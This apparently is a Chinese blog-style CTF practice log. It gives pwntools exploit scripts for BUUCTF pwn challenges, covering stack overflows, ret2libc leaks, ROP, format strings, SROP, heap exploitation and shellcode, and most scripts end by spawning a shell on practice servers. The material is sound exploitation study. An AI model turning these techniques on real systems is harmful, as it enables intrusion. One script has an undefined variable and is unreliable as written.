• 记录下自己在buu的刷题之旅,持续更新。由于本人是pwn新手,所以一些关于堆的题目先放着,等以后再补齐。下面直接放exp。(现在已经开始恶补堆题~)

1.test_your_nc

#!/usr/bin/python
#coding:utf-8

# test_your_nc: connectivity check only; nothing is sent before handing the
# session to the user.
from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
# pwntools magic args: running with `Q=1` picks the practice instance,
# otherwise the local binary is spawned.
if args.Q:
	io=remote('node3.buuoj.cn',29718)
else:
	io=process('./test')
io.interactive()

2.rip

#!/usr/bin/python
#coding:utf-8

# rip: single-send stack overflow PoC.
from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
# NOTE: unlike the other scripts on this page, `test` truthy means LOCAL;
# the default (0) connects to the practice instance.
test=0
if test:
	io=process('./pwn1')
else:
	io=remote('node3.buuoj.cn',25469)

# 15 bytes of padding, then the target address quoted in the writeup
# (hard-coded; not derived from the binary here).
payload ='a'*15
payload+=p64(0x401186)
io.sendline(payload)
io.interactive()

3.warmup_csaw_2016/

#!/usr/bin/python
#coding:utf-8

# warmup_csaw_2016: the program prints a hex address after 'WOW:' which is
# read back and used as the return target.
from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
# `test` truthy selects the local binary; 0 (default) the practice instance.
test=0
if test:
	io=process('warmup_csaw_2016')
else:
	io=remote('node3.buuoj.cn',27237)
io.recvuntil('WOW:')
# Exactly 8 hex characters are consumed and parsed as base-16.
cat_flag_addr=io.recv(8)
payload ='a'*72
payload+=p64(int(cat_flag_addr,16))
io.send(payload)
io.interactive()

4.pwn1_sctf_2016

#!/usr/bin/python
#coding:utf-8

# pwn1_sctf_2016: 32-bit target; payload uses p32 although context.arch is
# set to amd64 (p32 is explicit, so the context setting does not matter here).
from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
# `test` truthy selects the local binary; 0 (default) the practice instance.
test=0
if test:
	io=process('./pwn1')
else:
	io=remote('node3.buuoj.cn',25226)

# Padding values and the 32-bit address are taken from the writeup.
payload ='I'*20
payload+='a'*4
payload+=p32(0x8048f13)

io.send(payload)
io.interactive()

5.ciscn_2019_n_1

#!/usr/bin/python
#coding:utf-8

# ciscn_2019_n_1: single-send overflow PoC.
from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
# NOTE: this script uses `T=1` (not `Q=1` like the others) to select LOCAL;
# the default is the practice instance.
if args.T:
	io=process('ciscn_2019_n_1')
else:
	io=remote('node3.buuoj.cn',28867)

# 56 bytes of padding followed by the hard-coded address from the writeup.
payload ='a'*56
payload+=p64(0x4006be)
io.send(payload)
io.interactive()

6.ciscn_2019_c_1

#!/usr/bin/python
#coding:utf-8

# ciscn_2019_c_1: two-stage ret2libc. Stage 1 leaks a libc address via
# puts(GOT entry) and returns to the program start; stage 2 calls system.
# libc offsets are resolved online through LibcSearcher (third-party, not
# part of pwntools).
from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# NOTE: here `G=1` selects the REMOTE instance; default is local.
if args.G:
	io=remote('node3.buuoj.cn',28951)
else:
	io=process('./ciscn_2019_c_1')
elf=ELF('./ciscn_2019_c_1')

puts_plt=elf.plt['puts']
gets_got=elf.got['gets']

log.success('puts_plt => {}'.format(hex(puts_plt)))
# NOTE(review): the label says puts_got but the value printed is gets_got.
log.success('puts_got => {}'.format(hex(gets_got)))

# Gadget / entry addresses quoted from the writeup.
rdi_ret=0x00000000400c83
start_addr=0x400790

# NOTE(review): `p` is never defined in this script (the connection is
# bound to `io`), so this line raises NameError as written.
p.sendlineafter('choice!\n', '1')
 
payload1 = 'a' * (0x50 + 8)
payload1 += p64(rdi_ret) + p64(gets_got) + p64(puts_plt)
payload1 += p64(start_addr)
 
io.sendline(payload1)
 
io.recvuntil('@')
io.recvline()
# The leaked 6-byte address is zero-padded to 8 bytes before unpacking.
gets_leak = u64(io.recvline()[:-1].ljust(8, '\0'))
log.success('gets_leak_addr => {}'.format(hex(gets_leak)))
libc=LibcSearcher('gets',gets_leak)
libc_base=gets_leak-libc.dump('gets')
system_addr=libc_base+libc.dump('system')
binsh_addr=libc_base+libc.dump('str_bin_sh')
log.success('system_addr => {}'.format(hex(system_addr)))
log.success('binsh_addr => {}'.format(hex(binsh_addr)))

io.sendline('1')
 
# Stage 2: the extra 0x4006b9 before the pop-rdi gadget is a plain `ret`
# per the writeup (stack alignment); not verified here.
payload1 = 'a' * (0x50 + 8)
payload1 += p64(0x4006b9)+p64(rdi_ret) + p64(binsh_addr) + p64(system_addr)
payload1 += p64(start_addr)
 
io.sendline(payload1)
io.interactive()

7.babyrop

#!/usr/bin/python
#coding:utf-8

# babyrop: 32-bit ret2libc against a LOCAL process only (no remote branch).
# libc offsets come from a libc-2.23.so file shipped next to the script.
from pwn import * 


io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
system_libc=libc.symbols['system']
# Python 2 iterator protocol (.next()); would need next() on Python 3.
binsh_libc=libc.search('/bin/sh').next()
write_libc=libc.symbols['write']
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048825
# First input: a leading NUL then 0xff bytes; per the writeup this passes
# the program's length check ("Correct").
payload='\x00'+'\xff'*10
io.sendline(payload)
io.recvuntil("Correct\n")
# Stage 1: write(1, write@got, 4) then return to main.
payload='a'*(0xe7+4)+p32(write_plt)+p32(main_addr)
payload+=p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
write_addr=u32(io.recv(4))
base=write_addr-write_libc
system_addr=system_libc+base
binsh_addr=binsh_libc+base
payload='\x00'+'\xff'*10
io.sendline(payload)
io.recvuntil("Correct\n")
# Stage 2: system("/bin/sh") with main as the fake return address.
payload='a'*(0xe7+4)+p32(system_addr)+p32(main_addr)
payload+=p32(binsh_addr)
io.sendline(payload)
io.interactive()

8.get_start_3dsctf_2016 

#!/usr/bin/python
#coding:utf-8

# get_started_3dsctf_2016: 32-bit; calls a flag-printing function with two
# constant arguments, then reads whatever the program prints.
from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27979)
else:
	io=process('./get_started_3dsctf_2016')

# Addresses and the two argument constants are quoted from the writeup.
payload ='a'*56
payload+=p32(0x080489a0)
payload+=p32(0x0804e6a0)
payload+=p32(0x308CD64F)
payload+=p32(0x195719D1)
io.sendline(payload)
io.recvuntil('?')
# recv() with no size returns whatever arrives within context.timeout (1s).
flag=io.recv()
log.success('The flag is :{}'.format(flag))

9.not_the_same

#!/usr/bin/python
#coding:utf-8

# not_the_same_3dsctf_2016: 32-bit; chains get_secret -> print -> exit with
# a .bss address as print's argument.
from pwn import *
  
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
        io=remote('node3.buuoj.cn',28393)
else:
        io=process('./not_the_same_3dsctf_2016')
# All four addresses are quoted from the writeup.
get_secret=0x080489a0
print_addr=0x0804f0a0
bss_addr=0x080ECA2D
exit_addr=0x0804e660
payload ='a'*45
payload+=p32(get_secret)
payload+=p32(print_addr)
payload+=p32(exit_addr)
payload+=p32(bss_addr)
io.sendline(payload)
io.recvuntil('...')
# recv() with no size returns whatever arrives within context.timeout (1s).
flag=io.recv()
log.success('The flag is: {}'.format(flag))

10.[第五空间2019 决赛]PWN5

#!/usr/bin/python
#coding:utf-8

# [第五空间2019 决赛]PWN5: single format-string write (%n) to a fixed
# address, then the value written (4) is supplied as the password.
from pwn import * 
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',26151)	
else:
	io=process('./pwn')
# Target address and the argument index 10 are quoted from the writeup.
payload =p32(0x804C044)+"%10$n"
io.sendline(payload)
io.sendlineafter('passwd','4')
io.interactive()

11.ciscn_2019_n_8

#!/usr/bin/python
#coding:utf-8

# ciscn_2019_n_8: overwrites a checked variable with the expected value 0x11.
from pwn import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
        io=remote('node3.buuoj.cn',25574)
else:
        io=process('./ciscn_2019_n_8')

# 52 bytes of padding then the 32-bit value 0x11 (from the writeup).
payload ='a'*52
payload+=p32(0x11)
 
io.sendline(payload)
io.interactive()

12.babyheap_0ctf_2017

  • 碰到堆题,一般思路为先leak出main_arena地址,然后计算出malloc_hook偏移并伪造chunk,再进行修改,用uaf、double free等方法进行fastbin attack。
  • 这题的核心是堆溢出,不存在uaf漏洞。所以我们可以通过伪造chunk的方式(好像叫做堆叠)进行leak,从而进行fastbin attack。
#!/usr/bin/python
#coding:utf-8

# babyheap_0ctf_2017: harness setup. The helpers below wrap the program's
# numbered menu; leak()/pwn() drive the exploit.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',26601)
else:
	io=process('./babyheap_0ctf_2017')
# Symbols are read from the LOCAL system libc; offsets used later
# (0x3c4b78, one_gadget 0x4526a) are hard-coded for the writeup's libc.
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def allocate(size):
	"""Menu option 1: request a chunk of ``size`` bytes."""
	dialogue = (('Command: ', '1'), ('Size: ', str(size)))
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)

def fill(index,size,content):
	"""Menu option 2: write ``content`` into slot ``index``.

	``index`` is forwarded verbatim, so callers pass it as a string.
	"""
	io.sendlineafter('Command: ', '2')
	dialogue = (('Index: ', index), ('Size: ', str(size)), ('Content: ', content))
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)
	
def free(index):
	"""Menu option 3: release slot ``index`` (passed verbatim, as a string)."""
	dialogue = (('Command: ', '3'), ('Index: ', index))
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)

def dump(index):
	"""Menu option 4: print slot ``index`` and return its content line.

	The trailing newline of the received line is stripped.
	"""
	dialogue = (('Command: ', '4'), ('Index: ', index))
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)
	io.recvuntil('Content: \n')
	content_line = io.recvline()
	return content_line[:-1]
def leak():
	"""Leak a libc address through an overlapping chunk and return libc_base.

	Slot numbers in the trailing comments are the program's indices.
	The constant 0x3c4b78 is the writeup's main_arena offset for its libc.
	"""
	allocate(0x60)#0
	allocate(0x40)#1
	allocate(0x100)#2
	payload ='a'*0x60+p64(0)+p64(0x71)
	fill('0',0x70,payload)
	payload ='a'*0x10+p64(0)+p64(0x71)
	fill('2',0x20,payload)
	free('1')
	allocate(0x60)#1-3
	payload ='a'*0x40+p64(0)+p64(0x111)
	fill('1',0x50,payload)
	allocate(0x50)
	free('2')
	# Last 8 bytes of the dumped slot, zero-padded, hold the leaked pointer.
	libc_real=u64(dump('1')[-8:].ljust(8,'\x00'))
	libc_base=libc_real-0x3c4b78
	log.success('libc_real==>{}'.format(hex(libc_real)))
	log.success('libc_base==>{}'.format(hex(libc_base)))
	return libc_base

def pwn(libc_base):
	"""Second stage: point __malloc_hook at the writeup's one_gadget offset.

	Args:
		libc_base: value returned by leak().
	The one_gadget offset 0x4526a and the -35 fake-chunk offset are
	libc-version specific (taken from the writeup).
	"""
	malloc_hook = libc.symbols['__malloc_hook'] + libc_base
	one_gadget  =0x4526a+libc_base
	free('1')
	payload ='a'*0x60+p64(0)+p64(0x71)+p64(malloc_hook-35)+p64(0)
	fill('0', 0x80, payload)
	allocate(0x60)
	allocate(0x60)
	payload ='a'*19+p64(one_gadget)
	fill('2',len(payload),payload)
	# This allocation is what triggers the hook.
	allocate(0x20)
	io.interactive()
	
if __name__ == '__main__':
	# leak() must run first; pwn() depends on its libc_base.
	libc_base=leak()
	pwn(libc_base)
	

13.ciscn_2019_s_3

  • SROP.
#!/usr/bin/python
#coding:utf-8

# ciscn_2019_s_3: SROP. Stage 1 leaks a stack address; stage 2 sends a
# pwntools SigreturnFrame that performs execve("/bin/sh", 0, 0).
from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
        io=remote('node3.buuoj.cn',29831)
else:
        io=process('./ciscn_s_3')
# Gadget addresses quoted from the writeup.
gadgets=0x4004da
read_write_addr=0x4004f1
syscall_ret=0x400517
main_addr=0x40051D
# "/bin/sh\0" is placed at the start of the buffer so its stack address
# can be computed from the leak (offset 0x118 per the writeup).
payload = '/bin/sh\x00'.ljust(16,'a')
payload+=p64(read_write_addr)
io.sendline(payload)
io.recv(0x20)
binsh_addr=u64(io.recv(8))-0x118
log.success("binsh_addr==>{}".format(hex(binsh_addr)))
frameExecve=SigreturnFrame()
frameExecve.rax =constants.SYS_execve
frameExecve.rdi =binsh_addr
frameExecve.rsi =0
frameExecve.rdx =0
frameExecve.rip =syscall_ret

# str(frame) serializes the frame (Python 2 str == bytes).
payload ='a'*16
payload+=p64(gadgets)+p64(syscall_ret)+str(frameExecve)
io.sendline(payload)
io.interactive()

14.babyfengshui_33c3_2016

  • 这题考察的是堆溢出,但是有保护,我们可以通过利用unsorted bin合并的特性,来阻断这个验证从而实现堆溢出,然后就是修改free为system。
#!/usr/bin/python
#coding:utf-8

# babyfengshui_33c3_2016: harness setup; 32-bit target, libc offsets are
# resolved online via LibcSearcher.
from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27693)
else:
	io=process('./babyfengshui_33c3_2016')
elf=ELF('./babyfengshui_33c3_2016')
	
def add(size_des,name,text_len,text):
	"""Action 0: create a user with a description buffer, name and text."""
	dialogue = (
		('Action: ', '0'),
		('size of description: ', str(size_des)),
		('name: ', name),
		('text length: ', str(text_len)),
		('text: ', text),
	)
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)

def delete(index):
	"""Action 1: delete the user at ``index``."""
	for prompt, answer in (('Action: ', '1'), ('index: ', str(index))):
		io.sendlineafter(prompt, answer)
	
def display(index):
	"""Action 2: print the user at ``index`` (output is left for the caller to read)."""
	for prompt, answer in (('Action: ', '2'), ('index: ', str(index))):
		io.sendlineafter(prompt, answer)

def update(index,text_len,text):
	"""Action 3: replace the text of the user at ``index``."""
	dialogue = (
		('Action: ', '3'),
		('index: ', str(index)),
		('text length: ', str(text_len)),
		('text: ', text),
	)
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)
 	
def leak():
	"""Leak free@got via an oversized description and return its value.

	User 2 is created with "/bin/sh" as its text so a later free(2)
	has that string as argument once free@got is redirected.
	"""
	add(0x80,'0',0x80,'a')
	add(0x80,'1',0x80,'a')
	add(0x80,'2',0x80,'/bin/sh\x00')
	delete(0)
	# Text of length 0x19C overruns into user 1's description pointer.
	add(0x100,'3',0x19C,'a'*0x198+p32(elf.got['free']))
	display(1)
	io.recvuntil('description: ')
	free_leak=u32(io.recv(4))
	log.success('free_leak==>{}'.format(hex(free_leak)))
	return free_leak
def pwn(free_leak):
	"""Resolve system from the leak, redirect free@got to it, free user 2.

	Args:
		free_leak: value returned by leak().
	"""
	libc=LibcSearcher('free',free_leak)
	libc_base=free_leak-libc.dump('free')
	system_addr=libc_base+libc.dump('system')
	update(1,4,p32(system_addr))
	delete(2)
	io.interactive()
if __name__=='__main__':
	# leak() first; pwn() needs the leaked free address.
	free_leak=leak()
	pwn(free_leak)

15.[HarekazeCTF2019]baby_rop

#!/usr/bin/python
#coding:utf-8

# [HarekazeCTF2019]baby_rop: ROP that calls scanf to read "/bin/sh" into a
# writable address, then system on it. Both functions come from the PLT.
from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
        io=remote('node3.buuoj.cn',29836)
else:
        io=process('./babyrop')
elf=ELF('./babyrop')
scanf_addr=elf.plt['__isoc99_scanf']
system_addr=elf.plt['system']
# Writable address, "%s" format string and gadgets quoted from the writeup.
binsh_addr=0x601150
format_s=0x4006c5
p_r  =0x400683
p_p_r=0x400681
payload ='a'*0x18
payload+=p64(p_r)
payload+=p64(format_s)
payload+=p64(p_p_r)
payload+=p64(binsh_addr)
payload+=p64(0)
payload+=p64(scanf_addr)
payload+=p64(p_r)
payload+=p64(binsh_addr)
payload+=p64(system_addr)
payload+=p64(0)
#gdb.attach(io)
#pause()
io.sendline(payload)
# Fixed delay so scanf is waiting before the second line is sent.
sleep(1)
io.sendline('/bin/sh\x00')
io.interactive()

16.pwn2_sctf_2016

#!/usr/bin/python
#coding:utf-8

# pwn2_sctf_2016: 32-bit two-stage ret2libc. Stage 1 leaks printf@got via
# printf("%s", got) and returns to main; stage 2 calls system.
from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
        io=remote('node3.buuoj.cn',29744)
else:
        io=process('./pwn2_sctf_2016')
elf=ELF('pwn2_sctf_2016')

printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
# Address of a "%s" string in the binary (from the writeup).
format_s=0x080486f8
main_addr=elf.symbols['main']

log.success('printf_plt==>{}'.format(hex(printf_plt)))
log.success('printf_got==>{}'.format(hex(printf_got)))
# '-1' as the length passes the program's signed check (per the writeup).
io.sendline('-1')
io.recv()
payload ='a'*0x30
payload+=p32(printf_plt)
payload+=p32(main_addr)
payload+=p32(format_s)
payload+=p32(printf_got)
io.sendline(payload)
io.recvuntil('You said: ')
io.recvuntil('You said: ')
printf_leak=(u32(io.recv(4).ljust(4,'\x00')))
log.success('printf_leak==>{}'.format(hex(printf_leak)))

libc=LibcSearcher('printf',printf_leak)
libc_base_addr=printf_leak-libc.dump('printf')
system_addr=libc_base_addr+libc.dump('system')
binsh_addr=libc_base_addr+libc.dump('str_bin_sh')
log.success('system_addr==>{}'.format(hex(system_addr)))
log.success('binsh_addr==>{}'.format(hex(binsh_addr)))

io.sendline('-1')
io.recv()
payload ='a'*0x30
payload+=p32(system_addr)
payload+=p32(main_addr)
payload+=p32(binsh_addr)
io.sendline(payload)
io.interactive()

17.ciscn_2019_final_3

  • 这题只有两个功能,add和remove。所以要想着如何去泄漏libc。由于没有show功能和edit功能。正常思路一般是IO_stdout泄漏和hor,但是由于程序本身就有一个gift功能,所以我们可以另辟蹊径,通过tcache double free来合并堆块,进而得到libc,然后再free一块堆,由于当unsortbin为一块时,再次申请堆块,若处于unsortbin的大小范围内就会从其头部切割,剩下的往下移,这样我们就可以通过该机制申请堆块把unsortbin的fd移到已经free到tcache bin里面的堆块,然后再分配一个与其大小相同的堆块,就可以通过gift得到一个地址,再找到与libc的偏移,减去得libc_base然后就是double free随便打,free_hook还是malloc_hook随便你了。
#!/usr/bin/python
#coding:utf-8

# ciscn_2019_final_3: harness setup. libc 2.27 symbols are read from a
# host-specific absolute path (adjust for your machine).
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
libc = ELF('/home/dingjie/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
# Filled by leak() with the pointers the program hands out ("gift").
ptr_list=[]
# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',28589)
else:
	io=process('./ciscn_final_3')
def add(idx,sz,ct='a'):
	"""Menu option 1: allocate slot ``idx`` of ``sz`` bytes filled with ``ct``.

	``ct`` is sent raw (no newline). Returns the pointer the program prints
	after 'gift :' (14 characters parsed as hex).
	"""
	dialogue = (('choice > ', '1'), ('index\n', str(idx)), ('size\n', str(sz)))
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)
	io.sendafter('something\n', ct)
	io.recvuntil('gift :')
	user_ptr = int(io.recv(14), 16)
	log.success('user_ptr==>' + hex(user_ptr))
	return user_ptr
def dele(idx):
	"""Menu option 2: free slot ``idx``."""
	for prompt, answer in (('choice > ', '2'), ('index\n', str(idx))):
		io.sendlineafter(prompt, answer)
	
def leak():
	"""Drive the allocation sequence from the writeup and return the leaked pointer.

	Appends every 0x70-sized allocation's pointer to the module-level
	ptr_list; slot 2 is deliberately a different size (0x40).
	"""
	global ptr_list
	for i in range(0,9):#0-8
		if i==2:
			gift=add(i,0x40)
		else:
			gift=add(i,0x70)
			ptr_list.append(gift)
	add(9,0x50)#9 flag
	# Two consecutive frees of slot 5 (no intermediate allocation).
	dele(5)
	dele(5)
	add(10,0x70,p64(ptr_list[0]-0x10))#7=5
	add(11,0x70)
	add(12,0x70,p64(0)+p64(0x451))
	dele(0)
	dele(2)
	add(13,0x70)
	add(14,0x70)
	add(15,0x40)
	# The gift printed for this allocation is the value returned.
	leak=add(16,0x40)
	return leak
def pwn(leak):
	"""Second stage: place the writeup's one_gadget in __malloc_hook.

	Args:
		leak: value returned by leak(). Offsets 0x3ebca0 and 0x10a38c are
		specific to the libc named at the top of the script.
	"""
	libc_base=leak-0x3ebca0
	malloc_hook=libc_base+libc.sym['__malloc_hook']
	one_gadget=libc_base+0x10a38c
	add(17,0x20)
	dele(17)
	dele(17)
	add(18,0x20,p64(malloc_hook))
	add(19,0x20)
	add(20,0x20,p64(one_gadget))
	##gdb.attach(io)
	#pause()
	# Final allocation done by hand (not via add()) because the program
	# does not return to the 'gift' prompt once the hook fires.
	io.sendlineafter('choice > ','1')
	io.sendlineafter('index\n','21')
	io.sendlineafter('size\n','20')
	io.interactive()
if __name__=='__main__':
	# NOTE: this rebinds the module-level name `leak` from the function to
	# its integer result; harmless here since leak() is not called again.
	leak=leak()
	pwn(leak)

18.ez_pz_hackover_2016

#!/usr/bin/python
#coding:utf-8

# ez_pz_hackover_2016: 32-bit; the program prints a stack address which is
# used to return into shellcode placed in the same buffer.
from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',29026)
else:
	io=process('./ez_pz_hackover_2016')

# 8 hex digits after '0x'; the -28 adjustment is from the writeup.
io.recvuntil('0x')
stack_leak=int(io.recv(8),16)-28
log.success('stack__leak==>{}'.format(hex(stack_leak)))
# pwntools-generated i386 shell shellcode; the commented-out bytes below
# are a hand-written equivalent kept for reference.
shellcode = asm(shellcraft.sh())
#shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
io.recvuntil('> ')
# The input must start with "crashme\0" to pass the program's check.
payload ='crashme\x00'
payload+='a'*18
payload+=p32(stack_leak)
payload+=shellcode
#gdb.attach(io,'b *0x80486c6')
#pause()
io.sendline(payload)
io.interactive()

19.ciscn_2019_ne_5

#!/usr/bin/python
#coding:utf-8

# ciscn_2019_ne_5: 32-bit; logs in, stores an overflowing "info" string,
# then triggers the copy that overflows with menu option 4.
from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27750)
else:
	io=process("./ne_5")
elf=ELF('./ne_5')
system_addr=elf.plt['system']
exit_addr=elf.plt['exit']
# Address of an "sh" string inside the binary (from the writeup).
binsh_addr =0x80482ea
io.sendline('administrator')
io.sendlineafter('t\n:','1')
payload ='a'*76
payload+=p32(system_addr)
payload+=p32(exit_addr)
payload+=p32(binsh_addr)
payload+=p32(exit_addr)
#gdb.attach(io,'b 0x80486fc')
#pause()
io.sendlineafter('info:',payload)
io.sendlineafter('t\n:','4')
io.interactive()

20.ciscn_2019_n_3

  • 这题的free存在UAF漏洞。然后利用fastbin LIFO的特性,把free的指针改成system,之所以把print的指针改成sh,是因为free时指针指向这里,free的时候就相当于执行了system(sh)。(众所周知,sh也能开shell)
#!/usr/bin/python
#coding:utf-8

# ciscn_2019_n_3: harness setup; 32-bit target.
from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27570)
else:
	io=process('./ciscn_2019_n_3')
elf=ELF('./ciscn_2019_n_3')

def add(index,types,length,content):
	"""Menu option 1: create note ``index`` of kind ``types``.

	Type 1 takes a single integer value (``length`` is ignored); any other
	type takes a length followed by raw ``content``.
	"""
	io.sendlineafter('CNote > ','1')
	io.sendlineafter('Index > ',str(index))
	io.sendlineafter('Type > ',str(types))
	if types==1:
		io.sendlineafter('Value > ',str(content))
		return
	io.sendlineafter('Length > ',str(length))
	io.sendlineafter('Value > ',content)
def dele(index):
	"""Menu option 2: delete note ``index``."""
	for prompt, answer in (('CNote > ', '2'), ('Index > ', str(index))):
		io.sendlineafter(prompt, answer)
def show(index):
	"""Menu option 3: print note ``index`` (output left for the caller)."""
	for prompt, answer in (('CNote > ', '3'), ('Index > ', str(index))):
		io.sendlineafter(prompt, answer)

if __name__=='__main__':
	# Sequence from the writeup: two notes, free both, then reallocate so the
	# new note's buffer overlaps note 0's record ("sh\0\0" + system@plt).
	add(0,2,0x38,'www')#1
	add(1,1,0,0x41)#2
	dele(0)
	dele(1)
	add(2,2,0xc,'sh\x00\x00'+p32(elf.plt['system']))
	# Deleting note 0 again is what triggers the call.
	dele(0)
	io.interactive()

21.[HarekazeCTF2019]baby_rop2

#!/usr/bin/python
#coding:utf-8

# [HarekazeCTF2019]baby_rop2: two-stage ret2libc. Stage 1 leaks
# __libc_start_main@got through printf and returns to main; stage 2 calls
# system("/bin/sh"). Offsets resolved online via LibcSearcher.
from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',25639)
else:
	io=process("./babyrop2")
elf=ELF('./babyrop2')

printf_plt=elf.plt['printf']
libc_start_got=elf.got['__libc_start_main']
main_addr=elf.symbols['main']
# Format-string address and gadgets quoted from the writeup.
format_s=0x400770
pd_r=0x400733
ps_p15_r=0x400731

payload ='a'*0x28
payload+=p64(pd_r)
payload+=p64(format_s)
payload+=p64(ps_p15_r)
payload+=p64(libc_start_got)
payload+=p64(0)
payload+=p64(printf_plt)
payload+=p64(main_addr)

io.sendlineafter('? ',payload)
io.recvuntil('again, ')
io.recvuntil('again, ')
# 6 significant bytes of the leaked pointer, zero-padded to 8.
a=io.recv(6)
libc_leak =u64(a.ljust(8,'\x00'))
log.success('printf_leak==>{}'.format(hex(libc_leak)))

libc =LibcSearcher('__libc_start_main',libc_leak)
libc_base_addr=libc_leak-libc.dump('__libc_start_main')
system_addr=libc_base_addr+libc.dump('system')
binsh_addr=libc_base_addr+libc.dump('str_bin_sh')
# NOTE(review): this format string has no '{}' placeholder, so libc_base
# is never shown; the value is computed correctly and used below.
log.success('libc_base_address ==>'.format(hex(libc_base_addr)))
log.success('system_address    ==>{}'.format(hex(system_addr)))
log.success('binsh _address    ==>{}'.format(hex(binsh_addr)))
payload ='a'*0x28
payload+=p64(pd_r)
payload+=p64(binsh_addr)
payload+=p64(system_addr)
payload+=p64(main_addr)
io.sendlineafter('? ',payload)
io.interactive()

22.ciscn_2019_n_5

#!/usr/bin/python
#coding:utf-8

# ciscn_2019_n_5: shellcode is stored in .bss via the "name" input and the
# second input overflows the return address to point at it.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27657)
else:
	io=process("./ciscn_2019_n_5")
elf=ELF('./ciscn_2019_n_5')

# +0x20 into .bss is where the name buffer lives (per the writeup).
binsh_addr=elf.bss()+0x20

shellcode=asm(shellcraft.sh())

io.sendlineafter('name\n',shellcode)

payload ='a'*0x28
payload+=p64(binsh_addr)
io.sendlineafter('me?\n',payload)
io.interactive()

23.ciscn_2019_es_2

#!/usr/bin/python
#coding:utf-8

# ciscn_2019_es_2: 32-bit stack pivot. The first send leaks a stack address
# (printed back right after the 'b'*8 marker); the second builds a fake
# frame in the buffer and pivots to it with leave;ret.
from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
        io=remote('node3.buuoj.cn',27325)
else:
        io=process("./ciscn_2019_es_2")
elf=ELF('./ciscn_2019_es_2')

leave_ret=0x080484b8
system_addr=elf.plt['system']
payload ='a'*0x20
payload+='b'*8

io.send(payload)
io.recvuntil('b'*8)
# -0x38 converts the leaked value into the address of the input buffer
# (original comment, in pinyin: "input point location").
stack_leak=u32(io.recv(4).ljust(4,'\x00'))-0x38
log.success('stack_leak==>{}'.format(hex(stack_leak)))

#payload =p32(stack_leak+0x30)
# Fake frame: [saved ebp][system][ret][ptr to "/bin/sh" at buf+0x10] ...
payload =p32(0)
payload+=p32(system_addr)
payload+=p32(0)
payload+=p32(stack_leak+0x10)
payload+='/bin/sh\x00'
payload+='a'*0x10
payload+=p32(stack_leak)
payload+=p32(leave_ret)
io.send(payload)
io.interactive()

24.roarctf_2019_easy_pwn

